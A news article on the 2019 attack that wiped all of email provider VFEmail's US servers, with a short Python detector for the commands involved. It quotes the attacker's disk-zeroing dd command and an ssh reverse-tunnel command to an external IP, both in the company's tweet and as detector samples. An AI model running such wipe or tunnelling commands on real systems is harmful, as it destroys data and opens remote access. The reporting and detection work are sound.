Hackers wipe US servers of email provider VFEmail

Hackers breached the servers of the email provider VFEmail.net and erased data from all of its US servers, destroying all US customer data.
The attack took place yesterday, February 11, and was noticed after the company's website and webmail client went down without notice.
“At the moment, the attacker has formatted all the drives on each server,” the company said yesterday. “Every VM is lost. Every file server is lost, every backup server is lost.”
“It was more than a multi-password via an SSH exploit, and there was no ransom. Just attack and destroy,” VFEmail said.
I caught the criminal formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N
– VFEmail.net (@VFEmail) February 11, 2019
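As an added example (not part of the original article or of VFEmail's own tooling), the Python check below flags the two command shapes quoted in the tweet above when they show up in process-execution logs: a fill-pattern dd written to a raw disk, and an ssh client that disables host-key checks while reverse-forwarding the local sshd port. The finding names, the disk-prefix list and the two benign sample lines are assumptions made for the illustration.

```python
import shlex

LOOPBACK = {"127.0.0.1", "localhost"}  # bracketed IPv6 forward specs not handled
FILL_SOURCES = {"/dev/zero", "/dev/urandom", "/dev/random"}
DISK_PREFIXES = ("/dev/da", "/dev/ada", "/dev/sd", "/dev/vd", "/dev/nvme")

def ssh_options(argv):
    """Return ({-o key: value}, [-R specs]); accepts "-oK=V" and "-o K=V"."""
    opts, forwards = {}, []
    args = iter(argv[1:])
    for arg in args:
        if arg[:2] not in ("-o", "-R"):
            continue
        value = arg[2:] or next(args, "")
        if arg[:2] == "-R":
            forwards.append(value)
        elif "=" in value:
            key, val = value.split("=", 1)
            opts[key.lower()] = val.lower()
    return opts, forwards

def classify(cmdline):  # returns the findings raised by one logged command line
    argv = shlex.split(cmdline)
    prog = argv[0].rsplit("/", 1)[-1] if argv else ""
    findings = []
    if prog == "ssh":
        opts, forwards = ssh_options(argv)
        if (opts.get("stricthostkeychecking") == "no"
                and opts.get("userknownhostsfile") == "/dev/null"):
            findings.append("ssh-host-key-checks-disabled")
        for spec in forwards:
            parts = spec.split(":")  # [bind_address:]port:host:hostport
            if len(parts) >= 3 and parts[-1] == "22" and parts[-2] in LOOPBACK:
                findings.append("ssh-reverse-forward-to-local-sshd")
    elif prog == "dd":
        kv = dict(a.split("=", 1) for a in argv[1:] if "=" in a)
        if kv.get("if") in FILL_SOURCES and kv.get("of", "").startswith(DISK_PREFIXES):
            findings.append("dd-fill-to-raw-disk")
    return findings

SAMPLE = [  # first two: commands quoted in the tweet; last two: constructed benign lines
    "dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559",
    "ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null"
    " aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N",
    "dd if=/dev/zero of=/tmp/swapfile bs=1M count=1024",
    "ssh -L 8080:127.0.0.1:80 admin@bastion.example",
]
for line in SAMPLE:
    print(classify(line), "<-", line[:50])
```

The same matching can be applied to auditd execve records or EDR process events once the argument vector has been rejoined into a single command line.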
Company staff are now trying to recover user emails, but as it stands, all US customer data appears to have been deleted for good and sent to /dev/null.
The company's website is now back online, but its secondary domains, such as chewiemail.com, clovermail.net, mail-on.us, manlymail.net, metadatamitigator.com, offensivelytolerant.com, openmail.cc, powdermail.com and dentandmail.com, are still down.
US users accessing their respective VFEmail accounts will be greeted with empty inboxes. Users who can’t access their inboxes are prompted to send themselves an email, according to an explanation on the company’s website.
There is also no spam filter in place, but that will likely be the last thing on the minds of VFEmail users, as many have likely lost sensitive information that they had saved in their inboxes.
A spokesperson for VFEmail was not available for comment at the time of posting.
Rarely do hackers take steps to erase an entire business’s data. Most attacks typically result in hackers using compromised servers for other attacks (such as running botnets or hosting malware), or hackers demanding ransom from hacked victims.
The biggest ransom payment known to date was made by Nayana, a South Korean web hosting company that paid $1 million in Bitcoin after hackers entered its network and ran the Linux-based Erebus ransomware, which encrypted data on thousands of client servers.
In November 2015, VFEmail was one of several online email providers targeted by Armada Collective, a hacker group demanding ransom payments from victimized businesses to stop ongoing DDoS attacks [1, 2].
In June 2014, the infrastructure-as-a-service provider Code Spaces was forced to shut down after hackers also breached its servers and wiped them.